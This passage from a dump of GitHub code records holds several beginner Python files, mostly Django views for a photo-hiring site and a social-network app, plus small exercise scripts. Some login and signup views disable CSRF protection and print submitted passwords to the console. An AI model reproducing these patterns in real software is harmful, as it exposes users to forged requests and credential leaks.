import HttpResponse,HttpResponseRedirect\nfrom django.shortcuts import render, redirect,reverse\nfrom .forms import *\nfrom .models import *\nfrom django.views.decorators.csrf import csrf_exempt \nfrom django.contrib.auth import authenticate,login\nfrom django.contrib.auth.models import User\nimport random\n\nfrom django.contrib.auth import logout\n\ndef logout_view(request):\n print('logout view called')\n logout(request)\n #return render(request,'photohireapp/logout.html') Option 1\n return redirect('signin')\n\ndef user_profile(request):\n print('inside edit profile')\n if request.method=='POST':\n print('inside post' , request.POST,'>>user',request.user.id)\n form= editprofileform(request.POST, instance=request.user)\n if form.is_valid():\n print('form is valid')\n bio=form.cleaned_data['bio']\n user=User.objects.get(id=request.user.id).id\n print('User ' , user)\n print(bio)\n update=Profile.objects.filter(user=user).update(bio=bio)\n print('update ??' , update)\n #form.save()\n else:\n print(form.errors)\n else:\n form=editprofileform(instance=request.user)\n\n return render(request,'photohireapp/edit_profile.html',{'form':form})\n\t\ndef home(request):\n images = list(Images.objects.all())\n photographers = list(Profile.objects.filter(is_photographer=True))\n\n # Shuffle lists\n random.shuffle(images)\n random.shuffle(photographers)\n\n # Get first 3 from the shuffled list\n top_photographers = photographers[0:3]\n\n # Return all images and only 3 photographers\n return render(request, \n 'photohireapp/index.html', \n {'images':images, 'top_photographers':top_photographers}\n )\n\n\ndef explore(request):\n images = list(Images.objects.all())\n random.shuffle(images)\n # Get top 10 photographers based on their profile views\n trending_photographers = Profile.objects.filter(is_photographer=True).order_by('-profile_views')[:10]\n return render(request, \n 'photohireapp/expore.html',\n {'images':images, 'trending_photographers':trending_photographers}\n )\n\n\n@csrf_exempt\ndef signup(request):\n if request.method=='POST':\n print('inside signup page ' , request.POST)\n form=Tes(request.POST)\n form = UserSignUpForm(request.POST)\n if form.is_valid():\n print('form is valid',form.cleaned_data)\n user =form.save()\n user.refresh_from_db()\n user.profile.first_name=form.cleaned_data.get('first_name')\n user.profile.last_name=form.cleaned_data.get('last_name')\n user.profile.is_photographer=form.cleaned_data.get('is_photographer')\n user.save()\n #user_creation= form.save(commit=False)\n #user_creation.user=request.user.id\n\n print('##############################')\n print(request.user.id)\n #user_creation.save()\n print('%%%%%%%%%%%%%%')\n #user=form.save()\n #Profile.objects.create(user=user,bio=request.POST.get('bio'),first_name=request.POST.get('first_name'),last_name=request.POST.get('last_name'))\n #print(form.cleaned_data)\n #user.profile.birth_date = form.cleaned_data.get('birth_date') \n #user.save()\n raw_password = form.cleaned_data.get('password1')\n print(form.cleaned_data)\t\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n else:\n print(form.errors)\n\t #Profile.objects.create(first_name=first_name,last_name='lasyt')\n return redirect('/')\n else:\n print('get request called')\n form=UserCreationForm()\n args={'form':form}\n return render(request,\"photohireapp/sign-up.html\",args)\n return render(request, \n 'photohireapp/sign-in.html'\n )\n\n\n@csrf_exempt\ndef signin(request):\n if request.method =='POST':\n 
print(request.POST)\n form=LoginForm(request.POST)\n if form.is_valid():\n cd =form.cleaned_data\n user=authenticate(username = cd['email'] , password = cd['password'])\n if user:\n if user.is_active:\n login(request,user)\n return redirect('/user_profile/'+str(user.id))\n #return HttpResponse('Logged In Successfully !')\n else:\n return HttpResponse('Account has been disabled ')\n else:\n return HttpResponse('User does not Exist')\n else:\n\t print(form.errors)\n else:\n print('GET login called >>')\n form=LoginForm()\n return render(request , 'photohireapp/sign-in.html',{'form' :form})\n\n\n\n\n\n return render(request, \n 'photohireapp/sign-up.html'\n )\n\ndef about(request):\n return render(request, \n 'photohireapp/about.html'\n )\n\ndef search(request):\n # Get tag searched by user\n tag=request.GET['search']\n\n # contains case insensitive value of the query\n tagged_images = Images.objects.filter(tags__tag__icontains=tag)\n\n # Get all the tags\n all_tags = list(Tags.objects.all())\n random.shuffle(all_tags)\n tags_with_images = []\n for tag_ in all_tags:\n if Images.objects.filter(tags__tag__icontains=tag_).count()>0:\n tags_with_images.append(tag_)\n\n return render(request,\n 'photohireapp/search.html',\n {\n 'tagged_images': tagged_images,\n 'tag':tag,\n 'all_tags': tags_with_images\n }\n )\n\ndef user_profile(request, user_id):\n # if request.POST:\n # message=request.POST['message']\n # user_id=request.POST['user_id']\n # query=Comment(message=message) \n # query.user_id=user_id\n # query.save()\n\n comment_form = CommentForm()\n\n if request.method == 'POST':\n comment_form_with_data = CommentForm(request.POST)\n print(comment_form_with_data)\n comment_form_with_data.save()\n\n print(\"This works\")\n print(user_id)\n user_data = Profile.objects.get(id=user_id)\n comment = Comment.objects.filter(user_id=user_id)\n\n\n # Any number between 5 and 15\n n_recommended = random.randint(5,15)\n\n # randomly pick 'n_recommended' images from the database\n recommended_images = Images.objects.order_by('?')[:n_recommended]\n return render(request, 'photohireapp/profile.html', {\n 'user_data':user_data, \n 'recommended_images':recommended_images, \n 'n_recommended':n_recommended,\n 'comment': comment,\n 'comment_form': comment_form\n })\n","repo_name":"nishant184/django","sub_path":"photohireapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3974908912","text":"class Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return a list of length 2, [index1, index2]\n def searchRange(self, A, target):\n x = self.binSearch(A, 0, len(A) - 1, target)\n if x == -1: return [-1, -1]\n m = n = x\n while m >= 0 and A[m] == target: m -= 1\n while n <= len(A)-1 and A[n] == target: n += 1\n return [m + 1, n - 1]\n\n def binSearch(self, Array, left, right, target):\n if left > right: return -1\n mid = (left + right) / 2\n if Array[mid] == target:\n return mid \n elif Array[mid] > target:\n return self.binSearch(Array, left, mid - 1,target)\n else:\n return self.binSearch(Array, mid + 1, right, target)\n","repo_name":"wade123/Leetcode_Java_Python","sub_path":"Leetcode_Python/search_for_a_range.py","file_name":"search_for_a_range.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71605083627","text":"word1=input(\"enter a 
word:\")\n\nword2=input(\"enter another word:\")\n\nsrt1=sorted(word1)\n\nsrt2=sorted(word2)\n\nflag=0\n\nif(set(srt2).issubset(set(srt1))):\n flag=1\nif(flag):\n print(\"kangaroo\")\n\nelse:\n print(\"not kangaroo\") \n\n\n \n","repo_name":"deepakdpz/Pythonworks_Luminar","sub_path":"python_works/string/kangaroo.py","file_name":"kangaroo.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17088188315","text":"class Solution:\n def nearestExit(self, maze: List[List[str]], entrance: List[int]) -> int:\n def isvalid(p, q):\n return 0<=p None: \n self.base_folder_path = Path(f'{Config.values[\"RulesFolderPath\"]}/{self.exec_context.rule_name}/osmoscope-layer')\n self.file_name = self.extract_data('file_name', 'layer')\n self.data_format_url = self.extract_data('data_format_url', required=True)\n self.data['id'] = self.extract_data('id', default=self.exec_context.rule_name)\n\n def process(self, data_source_path: str) -> None:\n \"\"\"\n Create the JSON layer file containing the right data.\n \n It gets the GeoJSON url as data parameter and set it\n inside the layer file.\n \"\"\"\n self.add_last_update_date_layer_info()\n self.data[self.data_format_url] = data_source_path\n self.base_folder_path.mkdir(parents=True, exist_ok=True)\n full_path = self.base_folder_path / f'{self.file_name}.json'\n\n with open(full_path, 'w') as json_file:\n json.dump(self.data, json_file)\n \n file_url = f'{Config.values[\"WebPrefixPath\"]}/{self.exec_context.rule_name}/osmoscope-layer/{self.file_name}.json'\n self.add_layer_to_global_layers_file(file_url)\n \n def add_last_update_date_layer_info(self) -> None:\n \"\"\"\n Add a \"last_update\" field to the layer information.\n This field contains the date of the last database update. 
\n The date is extracted from the lastimportdate table of the database.\n \"\"\"\n with connect(Config.values['Dsn']) as conn:\n with conn.cursor() as cur:\n cur.execute(\"SELECT to_char(lastimportdate at time zone 'UTC', 'YYYY-MM-DD HH24:MI:SS UTC') FROM import_status\")\n last_update_date = cur.fetchone()\n if last_update_date:\n if not 'doc' in self.data:\n self.data['doc'] = {}\n self.data['doc']['last_update'] = last_update_date[0]\n\n def add_layer_to_global_layers_file(self, path: str) -> None:\n \"\"\"\n Add the newly created layer to the global layers file.\n If the global layers file doesn't exist it is created.\n \"\"\"\n folder_path = Path(f'{Config.values[\"RulesFolderPath\"]}')\n folder_path.mkdir(parents=True, exist_ok=True)\n # Check if the folder_path has a parent because /layers.json will require sudo permissions.\n full_path = folder_path / 'layers.json' if len(folder_path.parents) > 0 else Path('layers.json')\n full_path.touch(exist_ok=True)\n\n with open(full_path, 'r') as json_file:\n try:\n data = json.load(json_file)\n except:\n data = {\n 'name': 'Nominatim suspects',\n 'layers': []\n }\n if path not in data['layers']:\n data['layers'].append(path)\n with open(full_path, 'w') as json_file:\n json.dump(data, json_file)\n","repo_name":"osm-search/Nominatim-Data-Analyser","sub_path":"analyser/core/pipes/output_formatters/osmoscope_layer_formatter.py","file_name":"osmoscope_layer_formatter.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"19298001639","text":"#colorama is a library that allows us to print colored text to the console\nfrom colorama import Fore\nfrom colorama import Style\n\n#User can choose any one option like read ya write\noption = int(input('''Please select any operation: \n \n1) READ \n \n2) WRITE \n \nYour Choice: '''))\n\n#Taking input from the user\nfilename=input('enter_file_name=')\n\n#conditions are given to check the option\n\n#if user chooses 1 option then this condition wll be executed\nif option==1:\n #Read the text from the file\n with open(filename,'r') as f:\n #loop to read the text from the file\n \n for line in f:\n #Read the text from the file in terminal\n print(line,end='')\n\n# if user chooses 2 option then this condition will be executed \nelif option==2:\n #write the text into the file\n with open(filename,'a') as f:\n #take input from the user\n \n text=input('Enter text here=')\n #\\n is used to add new line\n f.write('\\n')\n\n #enter the text into the file\n f.write(text)\n\n #Message to text added Succesfully\n print(f'{Fore.YELLOW}Text is added successfully{Style.RESET_ALL}')","repo_name":"love870/documents","sub_path":"read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32312681694","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom signin.models import signup_model\nfrom .forms import ExperienceForm, AddressForm, SkillForm, InterestForm, Education_detailsForm, CertificationsForm,ProfilepicForm\nfrom .models import Experience, Address, Skill, Interest, Education_details, Certifications, user_profile, FollowNotification, Notification, Chats\nfrom profiles.models import Follow, Following, Follower\nfrom index.models import Posts\nfrom django.utils import timezone\nimport datetime\nimport 
pytz\n# Create your views here.\n\n#FORM OBJECTS\nexperience_form = ExperienceForm()\naddress_form = AddressForm()\nskill_form = SkillForm()\ninterest_form = InterestForm()\neducation_details_form = Education_detailsForm()\ncertifications_form = CertificationsForm()\n\n\n#REGISTRATION VARIABLE\nexp_registered = False\naddr_registered = False\nskl_registered = False\nintrst_registered = False\nedu_registered = False\ncert_registered = False\nover_registered = False\n\n#OVERVIEW FIELDS DATA VARIABLE\ndata_overview = \"\"\n\n#EXPERIENCE FIELDS DATA VARIABLES\ndata_company = \"\"\ndata_title = \"\"\ndata_location = \"\"\ndata_work_field = \"\"\ndata_from_date = None\ndata_to_date = None\ndata_descriptionExp = \"\"\n\n#ADDRESS FIELD DATA VARIABLES\ndata_locality = \"\"\ndata_city = \"\"\ndata_zip = \"\"\ndata_country = \"\"\n\n#SKILL FIELD DATA VARIABLES\ndata_skill_name = \"\"\n\n#INTEREST FIELD DATA VARIABLES\ndata_interest_name = \"\"\n\n#EDUCATION DETAILS FIELD DATA VARIABLES\ndata_school = \"\"\ndata_school_from = None\ndata_school_to = None\ndata_degree = \"\"\ndata_study_field = \"\"\ndata_descriptionEdu = \"\"\n\n#CERTIFICATION DETAILS FIELD DATA VARIABLES\ndata_certification_name = \"\"\ndata_authority = \"\"\ndata_cert_from = None\ndata_cert_to = None\ndata_cert_pic = None\n\n\n# TO CHAT WITH SOME ONE YOU HAVE TO FOLLOW HIM and HE HAS TO FOLLOW YOU BACK...??\n\nchats = []\nchat_name = \"\"\nchat_email = \"\"\nchat_image = None\n\ndef showchats(request):\n if request.session.has_key('username'):\n username = request.session['username']\n # user_details as ud\n ud = user_profile.objects.get(user_email=username)\n user_name = ud.user_name\n # chats = []\n # chat_name = \"\"\n # chat_email = \"\"\n if request.method == \"POST\":\n global chat_name\n global chat_email\n global chat_image\n chat_name = request.POST.get('chat_name')\n chat_email = request.POST.get('chat_email')\n chat_image=user_profile.objects.get(user_email=chat_email).user_image\n chat_details = []\n for c in ud.chats:\n if c.receiver_email == chat_email:\n chat_details.append(c)\n elif c.sender_email == chat_email:\n chat_details.append(c)\n\n\n # chat_timestap = [c.created_on for c in chat_details]\n # zipped_pairs = zip(chat_timestap, chat_details)\n # z = [x for _, x in sorted(zipped_pairs)]\n # z.reverse()\n # chats = z\n global chats\n chats = chat_details\n return chatView(request, chat_email, chat_name, chats, chat_image)\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef sendChats(request):\n if request.session.has_key('username'):\n username = request.session['username']\n # user_details as ud\n ud = user_profile.objects.get(user_email=username)\n user_name = ud.user_name\n # chats = []\n # chat_name = \"\"\n # chat_email = \"\"\n\n if request.method == \"POST\":\n recipient_name = request.POST.get('chat_name')\n recipient_email = request.POST.get('chat_email')\n\n global chat_name\n global chat_email\n global chat_image\n chat_name = recipient_name\n chat_email = recipient_email\n chat_image = user_profile.objects.get(user_email=chat_email).user_image\n message = request.POST.get('message')\n\n dt_utcnow = datetime.datetime.now(tz=pytz.UTC)\n created_on = dt_utcnow.astimezone(pytz.timezone('Asia/Kolkata'))\n print(created_on)\n print()\n print()\n print()\n\n # current user's chats list as chats_list1\n chats_list1 = ud.chats\n chats_list1.append(Chats(sender_name=user_name, sender_email=username, receiver_name=recipient_name, receiver_email=recipient_email, message=message, 
created_on=created_on))\n\n user_profile.objects.update_or_create(user_email=username , defaults={'chats': chats_list1,})\n\n # recipient_details as rd\n rd = user_profile.objects.get(user_email=recipient_email)\n\n # current user's frined's chats list as chats_list2\n chats_list2 = rd.chats\n chats_list2.append(Chats(sender_name=user_name, sender_email=username, receiver_name=recipient_name, receiver_email=recipient_email, message=message, created_on=created_on))\n\n user_profile.objects.update_or_create(user_email=recipient_email, defaults={'chats': chats_list2,})\n\n chat_details = []\n for c in ud.chats:\n if c.receiver_email == chat_email:\n chat_details.append(c)\n elif c.sender_email == chat_email:\n chat_details.append(c)\n\n # chat_timestap = [c.created_on for c in chat_details]\n # zipped_pairs = zip(chat_timestap, chat_details)\n # z = [x for _, x in sorted(zipped_pairs)]\n # z.reverse()\n # chats = z\n global chats\n chats = chat_details\n request.method = \"\"\n return chatView(request, chat_email, chat_name, chats,chat_image)\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n pass\n\n\ndef chatView(request, chat_email=\"\", chat_name=\"\", chats=[],chat_image=None):\n if request.session.has_key('username'):\n username = request.session['username']\n user_name = user_profile.objects.get(user_email=username).user_name\n user_img = user_profile.objects.get(user_email=username).user_image\n # follow_details as fd\n fd = Follow.objects.get(user_name=username)\n # user_details as ud\n ud = user_profile.objects.all()\n following_list = [f.email for f in fd.following]\n follower_list = [f.email for f in fd.follower]\n chats_list = []\n for f in following_list:\n if f in follower_list:\n chats_list.append(ud.filter(user_email=f)[0])\n return render(request, \"chat.html\", {'chat_image':chat_image,'user_img':user_img,'username':username, 'user_name':user_name, 'chats_list':chats_list, 'chat_email':chat_email, 'chat_name':chat_name, 'chats':chats})\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef my_profile_feed(request):\n if request.session.has_key('username'):\n global over_registered\n global exp_registered\n global addr_registered\n global skl_registered\n global intrst_registered\n global edu_registered\n global cert_registered\n over_registered = False\n exp_registered = False\n addr_registered = False\n skl_registered = False\n intrst_registered = False\n edu_registered = False\n cert_registered = False\n username = request.session['username']\n user_name = user_profile.objects.get(user_email=username).user_name\n profile_details = user_profile.objects.get(user_email = username)\n user_img = user_profile.objects.get(user_email=username).user_image\n\n overview = profile_details.overview\n experience_list = []\n address = profile_details.address\n skill_list = []\n interest_list = []\n edu_details_list = []\n cert_list = []\n experience_list = profile_details.experience\n experience_list.reverse()\n skill_list = profile_details.skills\n skill_list.reverse()\n interest_list = profile_details.interests\n interest_list.reverse()\n edu_details_list = profile_details.education_details\n edu_details_list.reverse()\n cert_list = profile_details.certifications\n cert_list.reverse()\n\n experience_form = ExperienceForm()\n address_form = AddressForm()\n skill_form = SkillForm()\n interest_form = InterestForm()\n education_details_form = Education_detailsForm()\n certifications_form = CertificationsForm()\n profilepic= ProfilepicForm()\n if 
request.method == 'POST':\n file = request.POST.get('image_upload')\n\n if file == 'image_up':\n profilepic = ProfilepicForm(request.POST, request.FILES)\n if profilepic.is_valid():\n if 'user_image' in request.FILES:\n user_image = request.FILES['user_image']\n\n user_details = user_profile.objects.get(user_email=username)\n updated_details = {'user_name': user_details.user_name,\n 'user_email': user_details.user_email,\n 'overview': user_details.overview,\n 'user_image': user_image,\n 'experience': user_details.experience,\n 'address': user_details.address,\n 'education_details': user_details.education_details,\n 'skills': user_details.skills,\n 'interests': user_details.interests,\n 'certifications': user_details.certifications\n }\n user_profile.objects.update_or_create(user_email=username, defaults=updated_details)\n return HttpResponseRedirect(request.path_info)\n # print(\"O: \"+request.POST.get(\"save_overview\"))\n if request.POST.get('save_overview') == \"Save\":\n print(\"OVERVIEW: \"+request.POST.get('save_overview'))\n overview = request.POST.get('overview')\n if request.POST.get(\"save_experience\") == \"Save\":\n print(\"EXPERIENCE: \"+request.POST.get(\"save_experience\"))\n\n data_company = request.POST.get(\"company\")\n data_title = request.POST.get(\"title\")\n data_location = request.POST.get(\"location\")\n data_work_field = request.POST.get(\"work_field\")\n data_from_date = request.POST.get(\"from_date\")\n data_to_date = request.POST.get(\"to_date\")\n data_descriptionExp = request.POST.get(\"descriptionExp\")\n\n experience_list.append(Experience(company=data_company, title = data_title, location=data_location, work_field=data_work_field,\n from_date=data_from_date, to_date=data_to_date, descriptionExp=data_descriptionExp))\n if request.POST.get(\"save_edu_details\") == \"Save\":\n print(\"EDUCATION: \"+request.POST.get(\"save_edu_details\"))\n education_details_form = Education_detailsForm(request.POST)\n if education_details_form.is_valid():\n data_school = education_details_form.cleaned_data['school']\n data_school_from = education_details_form.cleaned_data['school_from']\n data_school_to = education_details_form.cleaned_data['school_to']\n data_degree = education_details_form.cleaned_data['degree']\n data_study_field = education_details_form.cleaned_data['study_field']\n data_descriptionEdu = education_details_form.cleaned_data['descriptionEdu']\n edu_details_list.append(Education_details(school=data_school, school_from=data_school_from, school_to=data_school_to, degree=data_degree,\n study_field=data_study_field, descriptionEdu=data_descriptionEdu))\n\n if request.POST.get(\"save_address\") == \"Save\":\n print(\"ADDRESS: \"+request.POST.get(\"save_address\"))\n address_form = AddressForm(request.POST)\n if address_form.is_valid():\n data_locality = address_form.cleaned_data['locality']\n data_city = address_form.cleaned_data['city']\n data_zip = address_form.cleaned_data['zip']\n data_state = address_form.cleaned_data['state']\n data_country = address_form.cleaned_data['country']\n address = Address(locality=data_locality, city=data_city, zip=data_zip, state=data_state, country=data_country)\n\n if request.POST.get(\"save_interest\") == \"Save\":\n print(\"INTEREST: \"+request.POST.get(\"save_interest\"))\n interest_form = InterestForm(request.POST)\n if interest_form.is_valid():\n data_interest_name = interest_form.cleaned_data['interest_name']\n interest_list.append(Interest(interest_name=data_interest_name))\n\n if request.POST.get(\"save_cert_details\") 
== \"Save\":\n print(\"CERTIFICATION: \"+request.POST.get(\"save_cert_details\"))\n certifications_form = CertificationsForm(request.POST)\n if certifications_form.is_valid():\n data_certification_name = certifications_form.cleaned_data['certification_name']\n data_authority = certifications_form.cleaned_data['authority']\n data_cert_from = certifications_form.cleaned_data['cert_from']\n data_cert_to = certifications_form.cleaned_data['cert_to']\n data_cert_pic = certifications_form.cleaned_data['cert_pic']\n cert_list.append(Certifications(certification_name=data_certification_name, authority=data_authority, cert_from=data_cert_from,\n cert_to=data_cert_to, cert_pic=data_cert_pic))\n\n if request.POST.get(\"save_skill\") == \"Save\":\n print(\"SKILL: \"+request.POST.get(\"save_skill\"))\n skill_form = SkillForm(request.POST)\n if skill_form.is_valid():\n data_skill_name = skill_form.cleaned_data['skill_name']\n skill_list.append(Skill(skill_name=data_skill_name))\n\n updated_details = {'user_name':user_name, 'user_email':username, 'overview':overview, 'experience':experience_list,\n 'address':address, 'skills':skill_list, 'interests':interest_list,\n 'education_details':edu_details_list, 'certifications':cert_list}\n user_profile.objects.update_or_create(user_email=username, defaults=updated_details)\n profile_details = user_profile.objects.get(user_email = username)\n if Follow.objects.filter(user_name=username).exists():\n nfollower = len(Follow.objects.get(user_name=username).follower)\n nfollowing = len(Follow.objects.get(user_name=username).following)\n else:\n nfollower = 0\n nfollowing = 0\n count = 0\n postlist = []\n postlist = Posts.objects.filter(author=username, created_on__lte=timezone.now()).order_by('-created_on')\n\n # latest 5 notifications\n notifications = user_profile.objects.get(user_email=username).notification[-5:] + user_profile.objects.get(user_email=username).follow_notification[-5:]\n notifications_timestamp = [n.created_on for n in notifications]\n zipped_pairs = zip(notifications_timestamp, notifications)\n z = [x for _, x in sorted(zipped_pairs)]\n notifications = z[-5:]\n\n chats_list = user_profile.objects.get(user_email=username).chats\n chats_list.reverse()\n chats = []\n chats_count = 0\n for c in chats_list:\n if chats_count < 5:\n if c.sender_email != username:\n chats.append(c)\n chats_count += 1\n else:\n break\n return render(request, \"my_profile_feed.html\", {'profilepic': profilepic,'user_img':user_img,'user_name': user_name, 'username': username, 'postlist':postlist, 'experience_form':experience_form, 'address_form':address_form, 'skill_form':skill_form,\n 'interest_form':interest_form, 'education_details_form':education_details_form, 'certifications_form':certifications_form,\n 'profile_details':profile_details, 'experience_list':experience_list, 'skill_list':skill_list, 'interest_list':interest_list,\n 'edu_details_list':edu_details_list, 'cert_list':cert_list, 'follower':nfollower,'following':nfollowing, 'notifications':notifications, 'chats':chats})\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef deleteDetailsView(request):\n if request.session.has_key('username'):\n username = request.session['username']\n user_details = user_profile.objects.get(user_email = username)\n overview = user_details.overview\n experience = user_details.experience\n address = user_details.address\n skills = user_details.skills\n interests = user_details.interests\n education_details = user_details.education_details\n certifications = 
user_details.certifications\n notification = user_details.notification\n\n\n if request.GET.get('exp-delete') == 'delete':\n index = request.GET.get('counter')\n experience.remove(experience[int(index)-1])\n\n if request.GET.get('addr-delete') == 'delete':\n address = Address()\n\n if request.GET.get('edu-delete') == 'delete':\n index = request.GET.get('counter')\n education_details.remove(education_details[int(index)-1])\n\n if request.GET.get('cert-delete') == 'delete':\n index = request.GET.get('counter')\n certifications.remove(certifications[int(index)-1])\n\n if request.GET.get('skill-delete') == 'delete':\n index = request.GET.get('counter')\n skills.remove(skills[int(index)-1])\n\n if request.GET.get('interest-delete') == 'delete':\n index = request.GET.get('counter')\n interests.remove(interests[int(index)-1])\n\n updated_details = {\n 'user_name': user_details.user_name,\n 'user_email': user_details.user_email,\n 'overview': overview,\n 'experience': experience,\n 'address': address,\n 'skills': skills,\n 'interests': interests,\n 'education_details': education_details,\n 'certifications': certifications,\n 'notification': notification,\n }\n\n user_profile.objects.update_or_create(user_email=username, defaults=updated_details)\n return my_profile_feed(request)\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef customViewProfile(request):\n if request.session.has_key('username'):\n username = request.session['username']\n user_name = user_profile.objects.get(user_email=username).user_name\n profile_user_email = request.GET.get('profile_user_email')\n profile_user_name = user_profile.objects.get(user_email=profile_user_email).user_name\n user_profile_details = user_profile.objects.get(user_email = profile_user_email)\n user_img = user_profile_details.user_image\n\n if request.method == \"GET\" and request.GET.get(\"follow_button\") == \"Follow\":\n # follow_registered = False\n following_email = request.GET.get(\"profile_user_email\")\n following_name = user_profile.objects.get(user_email=following_email).user_name\n print(following_name)\n print()\n print()\n print()\n #FOLLOW LOGIC HERE\n username = request.session['username']\n follower_list = []\n following_list = []\n if Follow.objects.filter(user_name=username).exists():\n follow_details1 = Follow.objects.get(user_name = username)\n\n for i in follow_details1.follower:\n follower_list.append(Follower(name=i.name, email=i.email))\n for i in follow_details1.following:\n following_list.append(Following(name=i.name, email=i.email))\n\n # follower_list.append(Follower(name=, email=foll)))\n following_list.append(Following(name=following_name, email=following_email))\n following_update_details = {'user_name':username, 'follower':follower_list, 'following':following_list}\n Follow.objects.update_or_create(user_name=username, defaults=following_update_details)\n current_user_followings = following_list\n\n follower_list = []\n following_list = []\n if Follow.objects.filter(user_name=following_email).exists():\n follow_details2 = Follow.objects.get(user_name = following_email)\n for i in follow_details2.follower:\n follower_list.append(Follower(name=i.name, email=i.email))\n for i in follow_details2.following:\n following_list.append(Following(name=i.name, email=i.email))\n follower_name = user_profile.objects.get(user_email=username).user_name\n follower_list.append(Follower(name=follower_name, email=username))\n follower_update_details = {'user_name':following_email, 'follower':follower_list, 
'following':following_list}\n Follow.objects.update_or_create(user_name=following_email, defaults=follower_update_details)\n # follow_details.\n\n user_details = user_profile.objects.get(user_email=following_email)\n notification_list = user_details.follow_notification\n noti_msg = str(user_name) + \"(@\" + str(username) + \") has followed you...\"\n notification_list.append(FollowNotification(author=username, text=noti_msg, created_on=timezone.now()))\n user_updates = {'user_name': user_details.user_name, 'user_email': user_details.user_email,\n 'overview': user_details.overview,\n 'experience': user_details.experience, 'address': user_details.address,\n 'skills': user_details.skills, 'interests': user_details.interests,\n 'education_details': user_details.education_details,\n 'certifications': user_details.certifications, 'notification': user_details.notification, 'follow_notification': notification_list}\n user_profile.objects.update_or_create(user_email=user_details.user_email, defaults=user_updates)\n print(request.path_info)\n print()\n print()\n\n elif request.GET.get(\"follow_button\") == \"UnFollow\":\n #UNFOLLOW LOGIC HERE\n following_name = request.GET.get(\"profile_user_name\")\n following_email = request.GET.get(\"profile_user_email\")\n\n follows1 = Follow.objects.get(user_name = username)\n followings = []\n followers = []\n for f in follows1.following:\n if f.email == following_email:\n pass\n else:\n followings.append(Following(name=f.name, email=f.email))\n for f in follows1.follower:\n followers.append(Follower(name=f.name, email=f.email))\n follow_update_details1 = {'user_name':username, 'follower':followers, 'following':followings}\n Follow.objects.update_or_create(user_name=username, defaults=follow_update_details1)\n\n follows2 = Follow.objects.get(user_name = following_email)\n followings = []\n followers = []\n for f in follows2.following:\n followings.append(Following(name=f.name, email=f.email))\n for f in follows2.follower:\n if f.email == username:\n pass\n else:\n followers.append(Follower(name=f.name, email=f.email))\n follow_update_details2 = {'user_name':following_email, 'follower':followers, 'following':followings}\n Follow.objects.update_or_create(user_name=following_email, defaults=follow_update_details2)\n\n if Follow.objects.filter(user_name=username).exists():\n nfollower = len(Follow.objects.get(user_name=profile_user_email).follower)\n nfollowing = len(Follow.objects.get(user_name=profile_user_email).following)\n else:\n nfollower = 0\n nfollowing = 0\n count = 0\n\n current_user_follow_details = Follow.objects.get(user_name = username)\n current_user_followings = []\n for i in current_user_follow_details.following:\n current_user_followings.append(i.email)\n\n # latest 5 notifications\n notifications = user_profile.objects.get(user_email=username).notification[-5:] + user_profile.objects.get(user_email=username).follow_notification[-5:]\n notifications_timestamp = [n.created_on for n in notifications]\n zipped_pairs = zip(notifications_timestamp, notifications)\n z = [x for _, x in sorted(zipped_pairs)]\n notifications = z[-5:]\n\n chats_list = user_profile.objects.get(user_email=username).chats\n chats_list.reverse()\n chats = []\n chats_count = 0\n for c in chats_list:\n if chats_count < 5:\n if c.sender_email != username:\n chats.append(c)\n chats_count += 1\n else:\n break\n return render(request, \"customViewProfile.html\", {'user_img':user_img, 'username':username, 'user_name':user_name, 'profile_user_name':profile_user_name, 
'profile_user_email':profile_user_email, 'current_user_followings':current_user_followings, 'user_profile_details':user_profile_details, 'follower':nfollower,'following':nfollowing, 'notifications':notifications, 'chats': chats})\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n","repo_name":"sanujsriv/eCOSystem-MajorSSS","sub_path":"eCOSystem/my_profile_feed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":26830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26065404105","text":"# Write a program that takes an integer as input and prints out whether that integer is prime or not.\n \nnumber = int(input(\"Enter the number : \")) \ni = 2\nwhile i < number:\n if number % i == 0:\n break\n else: i = i + 1\nif number == i and number > 1:\n print(\"Prime\")\nelse: print(\"Not prime\")\n\n\n\n\n\n\n","repo_name":"LauraZabin/PhytonPracticalLZ","sub_path":"Tasks 03.09/5 task.py","file_name":"5 task.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72213710508","text":"class StatsFactory():\n def __init__(self, *args,**kwargs):\n self.help()\n self.data = args\n self._params = kwargs\n \n def fit(self,verbose=True):\n import statsmodels.api as sm\n from scipy import stats\n import numpy as np\n \n data = self.data\n self._normal = stats.normaltest(data) # normaltest result\n self._equal_var = stats.levene(*data) # levene expects each group as a separate positional argument\n self._mean = [np.mean(d) for d in data]\n self._sem = [stats.sem(d) for d in data]\n ## Check Group Sizes\n self._n = [len(x) for x in data]\n \n \n def help(self):\n \"\"\"Display hypothesis testing assumptions and workflow\"\"\"\n workflow=\"\"\"TO DO: DISPLAY OUTLINE FROM NOTES \"\"\"\n 